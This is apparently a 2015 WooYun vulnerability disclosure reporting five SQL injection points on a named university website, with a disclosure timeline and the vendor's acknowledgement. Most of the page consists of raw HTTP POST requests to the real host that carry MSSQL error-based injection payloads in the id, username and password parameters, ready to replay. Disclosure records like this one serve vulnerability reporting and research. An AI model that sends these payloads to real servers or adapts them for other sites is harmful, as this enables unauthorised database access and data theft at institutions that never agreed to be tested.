当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154738

漏洞标题:中南林业科技大学某站存在5处SQL注入漏洞

相关厂商:中南林业科技大学

漏洞作者: 路人甲

提交时间:2015-11-23 14:54

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-26: 厂商已经确认,细节仅向厂商公开
2015-12-06: 细节向核心白帽子及相关领域专家公开
2015-12-16: 细节向普通白帽子公开
2015-12-26: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

详细说明:

#1:

POST /hudong/Question.aspx?id=1 HTTP/1.1
Content-Length: 3475
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDQCCSATSC=IAJNHABCNLBHOAMJMCMDBPLD; ASP.NET_SessionId=qlrgk5nerlu2rlj4l25gp3ce
Host: woodscience.csuft.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWAgKvkoPnBAK/hdi9DFmYUn%2bxZgolXLs/6Viao%2buZrERIjUBJT7UoZWX/asfM&__VIEWSTATE=/wEPDwUKLTYzODY2MjA5NQ9kFgJmD2QWAgIHD2QWAgIBD2QWEmYPFgIeBFRleHQFGOS7gOS5iOWPq%2bi%2bueadkOOAgeW/g%2badkGQCAQ8WAh8ABRAyMDEzLTA5LTE3IDExOjAyZAICDxYCHwAFCeWQkeiJs%2biJs2QCAw8WAh8ABQE0ZAIKDxYCHwAFATRkAgsPFgIeC18hSXRlbUNvdW50AgQWCGYPZBYEZg8PFgIeD0NvbW1hbmRBcmd1bWVudAUCMjlkZAIBDxUDEDIwMTMtMDktMTcgMTI6NTEG6ZmI6Zye4QHlv4PmnZDnmoTpopzoibLlj4rlv4PjgIHovrnmnZDnlYznur/nmoTmmI7mmbDluqbvvIzlr7nmnKjmnZDpibTliKvmmK/mnInluK7liqnnmoTjgILlpoLmnKjojrLnmoTlv4PmnZDpnZLnu7/oibLvvIznuqLosYbmnYnnmoTlv4PmnZDnuqLopJDoibLvvIzph47mvIbnmoTlv4PmnZDmt7Hpu4ToibLvvIzovrnmnZDpu4Tnmb3oibLvvIzlv4PjgIHovrnmnZDnmoTnlYznur/miKrnhLbliIbmmI7jgIJkAgEPZBYEZg8PFgIfAgUCMjhkZAIBDxUDEDIwMTMtMDktMTcgMTI6NTEG6ZmI6ZyehgTlv4PmnZDnmoTlvaLmiJDmmK/nlLHovrnmnZDovazlj5jogIzmnaXvvIzmmK/kuIDkuKrlpI3mnYLnmoTljJblrablj5jljJblkoznlJ/nianljJblrablj5jljJbnmoTov4fnqIvjgILmoJHmnKjnlJ/plb/vvIznlLHkuo7lvaLmiJDlsYLmr4/lubTlkJHlhoXkuqfnlJ/mnKjotKjpg6go5pyo5p2QKe%2b8jOS9v%2bW9ouaIkOWxguS4juWGhemDqOmAkOW5tOWinuWkp%2bi3neemu%2b%2b8jOWvvOiHtOacgOWFiOW9ouaIkOeahOacqOadkOe7huiDnumAkOa4kOe8uuawp%2b%2b8jOW8lei1t%2beUn%2ba0u%2be7huiDnuWRvOWQuOS9nOeUqOWBnOatouacgOe7iOatu%2bS6oeOAguaOpeedgOa3gOeyieWSjOawtOWIhua2iOWkse%2b8jOmFmuexu%2bWMluWQiOeJqeeahOawp%2bWMluWSjOiBmuWQiO%2b8jOiDnuiFlOayieenr%2beJqeeahOWghuenr%2b%2b8jOi%2bk%2bWvvOe6v%2bi3r%2beahOWgteWhnu%2b8jOiJsue0oOeJqei0qOeahOeUn%2baIkO%2b8jOS9v%2baYvuekuueJueacieeahOW/g%2badkOminOiJsu%2b8jOS4jui%2bueadkOacieaYjuaYvueahOWMuuWIq%2bOAgmQCAg9kFgRmDw8WAh8CBQIyN2RkAgEPFQMQMjAxMy0wOS0xNyAxMjo1MQbpmYjpnJ6NAuW/g%2badkCAg5oyH5Zyo55Sf5rS755qE5qCR5pyo5Lit5LiN5ZCr5pyJ55Sf5rS757uG6IOe77yM5LiN6LSu6JeP5reA57KJ55qE5YaF6YOo5pyo5p2Q77yM5Zyo5qiq5YiH6Z2i5LiK5L2N5LqO6auT5b%2bD5ZGo5Zu077yM5p2Q6Imy6L6D5rex77yM5rC05YiG5Lqm5bCR55qE6YOo5YiG77yM56ew5Li65b%2bD5p2Q44CC5Yeh5b%2bD44CB6L655p2Q5Yy65YiG5piO5pi%2b55qE5qCR56eN77yM5Y%2br5b%2bD5p2Q5qCR56eN77yM5aaC5p2%2b5pyo44CB5p2J5pyo44CB5Yi65qeQ562J44CCZAIDD2QWBGYPDxYCHwIFAjI2ZGQCAQ8VAxAyMDEzLTA5LTE3IDEyOjUxBumZiOmcnsID6L655p2QICDmjIflnKjnlJ/mtLvnmoTmoJHmnKjkuK3kuI3lkKvmnInnlJ/mtLvnu4bog57lkozotK7ol4/mt4DnsonnmoTlpJbpg6jmnKjmnZDvvIzlnKjmqKrliIfpnaLkuIrpnaDmoJHnmq7mlrnlkJHvvIzmnZDoibLovoPmtYXvvIzmsLTliIbovoPlpJrnmoTpg6jliIbvvIznp7DkuLrovrnmnZDjgILkvYblupTms6jmhI/vvIzovrnmnZDkuI7ovrnmnZDmoJHnp43nmoTmpoLlv7XmmK/kuI3lkIznmoTjgILlh6Hku47mnKjmnZDpopzoibLlkozlkKvmsLTnjofpg73nnIvkuI3lh7rpnaDmoJHnmq7pg6jliIblkozov5Hpq5Plv4Ppg6jliIbnmoTlj5jljJbnlYzpmZDnmoTmoJHnp43vvIzljbPml6DovrnmnZDkuI7lv4PmnZDnlYzpmZDnmoTmoJHnp43vvIzlj6vovrnmnZDmoJHnp43jgILlpoLmoabmnKjjgIEgIOacqOOAgeadqOagkeOAgem5heiAs%2baepeWPiuanreacqOexu%2betieOAgg0KZAIMD2QWBmYPFgIfAAUJ5ZCR6Imz6ImzZAIBDxYCHwBkZAICDxYCHwBkZAINDxYCHwECBRYKZg9kFgJmDxUCAjIxLeaAjuagt%2beUqOW5sueHpeazleaPkOmrmOacqOadkOWwuuWvuOeahOeos%2bKApmQCAQ9kFgJmDxUCAjIwHuaAjuagt%2bi/m%2bihjOacqOadkOmYsueBq%2bWkhOeQhmQCAg9kFgJmDxUCAjE5HuS7gOS5iOWPq%2bW8gOWtlOadkOWSjOmXreWtlOadkGQCAw9kFgJmDxUCAjE4GOS7gOS5iOWPq%2bi9r%2badkOWSjOehrOadkGQCBA9kFgJmDxUCAjE3DeiJr%2badkOaYr3doYXRkAg4PFgIfAQIFFgpmD2QWAmYPFQIBOCTmnKjmnZDnu4bog57lo4Hnu5PmnoTlj6/liIblpJrlsJHlsYJkAgEPZBYCZg8VAgE5JOacqOadkOe7huiDnuWjgeeUseWTquS6m%2beJqei0qOe7hOaIkGQCAg9kFgJmDxUCAjEwGOS7gOS5iOWPq%2bWGheearuWSjOWkluearmQCAw9kFgJmDxUCAjEzGOS7gOS5iOWPq%2bi%2bueadkOOAgeW/g%2badkGQCBA9kFgJmDxUCAjIxLeaAjuagt%2beUqOW5sueHpeazleaPkOmrmOacqOadkOWwuuWvuOeahOeos%2bKApmRkcsuJZLObjJgIXWkeVQHe2qy9n5kxePYfN2NFXGLlOTI%3d&__VIEWSTATEGENERATOR=E00502CB

id参数存在注入

111.png


#2:

POST /hudong/ HTTP/1.1
Content-Length: 1876
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDQCCSATSC=IAJNHABCNLBHOAMJMCMDBPLD; ASP.NET_SessionId=qlrgk5nerlu2rlj4l25gp3ce
Host: woodscience.csuft.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
ctl00%24Content%24btnLogin=%e7%99%bb%e5%bd%95&ctl00%24Content%24txtName='%2b(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(86)%2bCHAR(103)%2bCHAR(113)%2bCHAR(53)%2bCHAR(56)%2bCHAR(70)%2bCHAR(102)%2bCHAR(112))%20FROM%20syscolumns)%2b'&ctl00%24Content%24txtPass=g00dPa%24%24w0rD&__EVENTVALIDATION=/wEWBALeq4TgBwLfuaLaCgLJuZK3DQLJwaF%2bbq32PodZoB6Xo3Nkel8z6di%2bjiBGOm9DzVoAPQR5zLg%3d&__VIEWSTATE=/wEPDwULLTE1ODU3NDM1OTcPZBYCZg9kFgICBw9kFggCAw8WAh4LXyFJdGVtQ291bnQCCBYQZg9kFgJmDxUCATEn5oKo6K6k5Li65Lit5Y2X5p6X5Lia56eR5oqA5aSn5a2m44CK4oCmZAIBD2QWAmYPFQIBNSfmgqjorqTkuLrkuK3ljZfmnpfkuJrnp5HmioDlpKflrabjgIrigKZkAgIPZBYCZg8VAgE2J%2baCqOiupOS4uuS4reWNl%2bael%2bS4muenkeaKgOWkp%2bWtpuOAiuKApmQCAw9kFgJmDxUCATcn5oKo6K6k5Li65Lit5Y2X5p6X5Lia56eR5oqA5aSn5a2m44CK4oCmZAIED2QWAmYPFQIBOCfmgqjlr7nkuK3ljZfmnpfkuJrnp5HmioDlpKflrabjgIrmnKjigKZkAgUPZBYCZg8VAgE5CXl1NjU2ZmRzIGQCBg9kFgJmDxUCATIn5oKo5a%2b55Lit5Y2X5p6X5Lia56eR5oqA5aSn5a2m44CK5pyo4oCmZAIHD2QWAmYPFQIBMyfmgqjorqTkuLrkuK3ljZfmnpfkuJrnp5HmioDlpKflrabjgIrigKZkAgUPFgIfAAICFgRmD2QWAmYPFQIBNCfkvaDop4nlvpfmlZnluIjorrLor77lupTor6XlpJrorrLkuIDigKZkAgEPZBYCZg8VAgEzIeS9oOacgOWWnOasouWTquS9jeS4u%2biusuaVmeW4iO%2b8n2QCBw8WAh8AAgoWFGYPZBYCZg8VAgE4JOacqOadkOe7huiDnuWjgee7k%2baehOWPr%2bWIhuWkmuWwkeWxgmQCAQ9kFgJmDxUCATkk5pyo5p2Q57uG6IOe5aOB55Sx5ZOq5Lqb54mp6LSo57uE5oiQZAICD2QWAmYPFQICMTAY5LuA5LmI5Y%2br5YaF55qu5ZKM5aSW55quZAIDD2QWAmYPFQICMTMY5LuA5LmI5Y%2br6L655p2Q44CB5b%2bD5p2QZAIED2QWAmYPFQICMjEn5oCO5qC355So5bmy54el5rOV5o%2bQ6auY5pyo5p2Q5bC65a%2b44oCmZAIFD2QWAmYPFQICMTcN6Imv5p2Q5pivd2hhdGQCBg9kFgJmDxUCAjE0G%2bS7gOS5iOWPq%2beUn%2bmVv%2bi9ruOAgeW5tOi9rmQCBw9kFgJmDxUCAjE2GOS7gOS5iOWPq%2badkOi0qOOAgeadkOaAp2QCCA9kFgJmDxUCAjIwHuaAjuagt%2bi/m%2bihjOacqOadkOmYsueBq%2bWkhOeQhmQCCQ9kFgJmDxUCATEb5LuA5LmI5Y%2br5YGa6IGa57yY57q55a2U77yfZAILDxYCHwBmZGSE1kx7XLN%2bi4/K16RBbZMm2e4J2wpxq93Xyo8LlcVixw%3d%3d&__VIEWSTATEGENERATOR=9330CD47

ctl00%24Content%24txtName 存在注入
#3:

POST /hudong/Index.aspx HTTP/1.1
Content-Length: 1865
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDQCCSATSC=IAJNHABCNLBHOAMJMCMDBPLD; ASP.NET_SessionId=qlrgk5nerlu2rlj4l25gp3ce
Host: woodscience.csuft.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
ctl00%24Content%24btnLogin=%e7%99%bb%e5%bd%95&ctl00%24Content%24txtName=lvqjmqok&ctl00%24Content%24txtPass='%2b(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(86)%2bCHAR(90)%2bCHAR(48)%2bCHAR(73)%2bCHAR(73)%2bCHAR(55)%2bCHAR(116)%2bCHAR(75))%20FROM%20syscolumns)%2b'&__EVENTVALIDATION=/wEWBALeq4TgBwLfuaLaCgLJuZK3DQLJwaF%2bbq32PodZoB6Xo3Nkel8z6di%2bjiBGOm9DzVoAPQR5zLg%3d&__VIEWSTATE=/wEPDwULLTE1ODU3NDM1OTcPZBYCZg9kFgICBw9kFggCAw8WAh4LXyFJdGVtQ291bnQCCBYQZg9kFgJmDxUCATEn5oKo6K6k5Li65Lit5Y2X5p6X5Lia56eR5oqA5aSn5a2m44CK4oCmZAIBD2QWAmYPFQIBNSfmgqjorqTkuLrkuK3ljZfmnpfkuJrnp5HmioDlpKflrabjgIrigKZkAgIPZBYCZg8VAgE2J%2baCqOiupOS4uuS4reWNl%2bael%2bS4muenkeaKgOWkp%2bWtpuOAiuKApmQCAw9kFgJmDxUCATcn5oKo6K6k5Li65Lit5Y2X5p6X5Lia56eR5oqA5aSn5a2m44CK4oCmZAIED2QWAmYPFQIBOCfmgqjlr7nkuK3ljZfmnpfkuJrnp5HmioDlpKflrabjgIrmnKjigKZkAgUPZBYCZg8VAgE5CXl1NjU2ZmRzIGQCBg9kFgJmDxUCATIn5oKo5a%2b55Lit5Y2X5p6X5Lia56eR5oqA5aSn5a2m44CK5pyo4oCmZAIHD2QWAmYPFQIBMyfmgqjorqTkuLrkuK3ljZfmnpfkuJrnp5HmioDlpKflrabjgIrigKZkAgUPFgIfAAICFgRmD2QWAmYPFQIBNCfkvaDop4nlvpfmlZnluIjorrLor77lupTor6XlpJrorrLkuIDigKZkAgEPZBYCZg8VAgEzIeS9oOacgOWWnOasouWTquS9jeS4u%2biusuaVmeW4iO%2b8n2QCBw8WAh8AAgoWFGYPZBYCZg8VAgE4JOacqOadkOe7huiDnuWjgee7k%2baehOWPr%2bWIhuWkmuWwkeWxgmQCAQ9kFgJmDxUCATkk5pyo5p2Q57uG6IOe5aOB55Sx5ZOq5Lqb54mp6LSo57uE5oiQZAICD2QWAmYPFQICMTAY5LuA5LmI5Y%2br5YaF55qu5ZKM5aSW55quZAIDD2QWAmYPFQICMTMY5LuA5LmI5Y%2br6L655p2Q44CB5b%2bD5p2QZAIED2QWAmYPFQICMjEn5oCO5qC355So5bmy54el5rOV5o%2bQ6auY5pyo5p2Q5bC65a%2b44oCmZAIFD2QWAmYPFQICMTcN6Imv5p2Q5pivd2hhdGQCBg9kFgJmDxUCAjE0G%2bS7gOS5iOWPq%2beUn%2bmVv%2bi9ruOAgeW5tOi9rmQCBw9kFgJmDxUCAjE2GOS7gOS5iOWPq%2badkOi0qOOAgeadkOaAp2QCCA9kFgJmDxUCAjIwHuaAjuagt%2bi/m%2bihjOacqOadkOmYsueBq%2bWkhOeQhmQCCQ9kFgJmDxUCATEb5LuA5LmI5Y%2br5YGa6IGa57yY57q55a2U77yfZAILDxYCHwBmZGSE1kx7XLN%2bi4/K16RBbZMm2e4J2wpxq93Xyo8LlcVixw%3d%3d&__VIEWSTATEGENERATOR=9330CD47

ctl00%24Content%24txtPass 存在注入
#4:

POST /hudong/Topic.aspx?id=(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(98)%2bCHAR(70)%2bCHAR(54)%2bCHAR(121)%2bCHAR(49)%2bCHAR(104)%2bCHAR(68)%2bCHAR(112))%20FROM%20syscolumns) HTTP/1.1
Content-Length: 1456
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDQCCSATSC=IAJNHABCNLBHOAMJMCMDBPLD; ASP.NET_SessionId=qlrgk5nerlu2rlj4l25gp3ce
Host: woodscience.csuft.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
ctl00%24Content%24btnLogin=%e7%99%bb%20%e5%bd%95&ctl00%24Content%24topicID=3&ctl00%24Content%24txtName=mfhpefxl&ctl00%24Content%24txtPass=g00dPa%24%24w0rD&__EVENTVALIDATION=/wEWBQL0%2b6%2b3CgL%2b5ZZ5At%2b5otoKAsm5krcNAsnBoX58iPqpq4CUKg1sSEr2RmCYKCisLMlfLRk5QFY4/FOLxw%3d%3d&__VIEWSTATE=/wEPDwUKLTY1MTk2NDk0OA9kFgJmD2QWAgIHD2QWEGYPFgIeBFRleHQFIeS9oOacgOWWnOasouWTquS9jeS4u%2biusuaVmeW4iO%2b8n2QCAQ8WAh8ABRAyMDEzLTA5LTE3IDEwOjQwZAICDxYCHwAFAjEwZAIDDxYCHwBlZAIEDxYCHgtfIUl0ZW1Db3VudAIFFgpmD2QWAmYPFQMQMjAxMy0wOS0xNyAwMTo1NAbmnY7lvawJ6IuM5aeX5aeXZAIBD2QWAmYPFQMQMjAxMy0wOS0xNyAwMTo1MgnotL7pl6rpl6ob5rOV5Zu95Zue5p2l55qE6YKj5L2N576O5aWzZAICD2QWAmYPFQMQMjAxMy0wOS0xNyAwMTo1MAbpgqLkuq4c5p2O5paw5YqffiAg5oiR5Zac5qyi56u55p2QfmQCAw9kFgJmDxUDEDIwMTMtMDktMTcgMDE6NDUJ5p2o5LiA6bijP%2bWQtOiAgeW4iO%2b8ge%2b8ge%2b8ge%2b8ge%2b8ge%2b8ge%2b8ge%2b8ge%2b8ge%2b8ge%2b8ge%2b8ge%2b8ge%2b8ge%2b8ge%2b8ge%2b8ge%2b8gWQCBA9kFgJmDxUDEDIwMTMtMDktMTcgMDE6NDIG546L6JCMLuadjui0pOWGm%2biAgeW4iOS5n%2bS4jemUmeWVin7kvaDku6zkuI3op4nlvpflkaJkAgYPZBYGZg8WAh8ABQbmnY7lvaxkAgEPFgIfAGRkAgIPFgIfAGRkAgcPFgIfAQICFgRmD2QWAmYPFQIBNC3kvaDop4nlvpfmlZnluIjorrLor77lupTor6XlpJrorrLkuIDkupvnkIbigKZkAgEPZBYCZg8VAgEzIeS9oOacgOWWnOasouWTquS9jeS4u%2biusuaVmeW4iO%2b8n2QCCA8WAh8BAgIWBGYPZBYCZg8VAgE0LeS9oOinieW%2bl%2baVmeW4iOiusuivvuW6lOivpeWkmuiusuS4gOS6m%2beQhuKApmQCAQ9kFgJmDxUCATMh5L2g5pyA5Zac5qyi5ZOq5L2N5Li76K6y5pWZ5biI77yfZGRzqJ0SiDroNedo/nnDCLGUpJbFTMH5zl4fqtbxoB2OSg%3d%3d&__VIEWSTATEGENERATOR=B77F3A4B

id参数存在注入
#5:

POST /hudong/UCenter/Login.aspx?ReturnUrl=/hudong/UCenter/Info/Info.aspx HTTP/1.1
Content-Length: 505
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDQCCSATSC=IAJNHABCNLBHOAMJMCMDBPLD; ASP.NET_SessionId=qlrgk5nerlu2rlj4l25gp3ce
Host: woodscience.csuft.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
ctl00%24Content%24btnRegister=%e7%99%bb%e5%bd%95&ctl00%24Content%24txtName='%2b(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(81)%2bCHAR(65)%2bCHAR(54)%2bCHAR(102)%2bCHAR(113)%2bCHAR(116)%2bCHAR(116)%2bCHAR(83))%20FROM%20syscolumns)%2b'&ctl00%24Content%24txtPass=g00dPa%24%24w0rD&__EVENTVALIDATION=/wEWBALK2fa0DQLfuaLaCgLJuZK3DQLNz6mCAy0V4cYQ06jBKXTU4oKfX5x/oXc6feZpGse2O2/dwk9l&__VIEWSTATE=/wEPDwULLTE0MjI0MDA2ODFkZBH6nPgZSyPJNwvbY1tfLPVCz7CotnuEUTDu1Z0aiwPL&__VIEWSTATEGENERATOR=445A2F06

ctl00%24Content%24txtName 存在注入

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-11-26 11:14

厂商回复:

谢谢

最新状态:

暂无


漏洞评价:

评价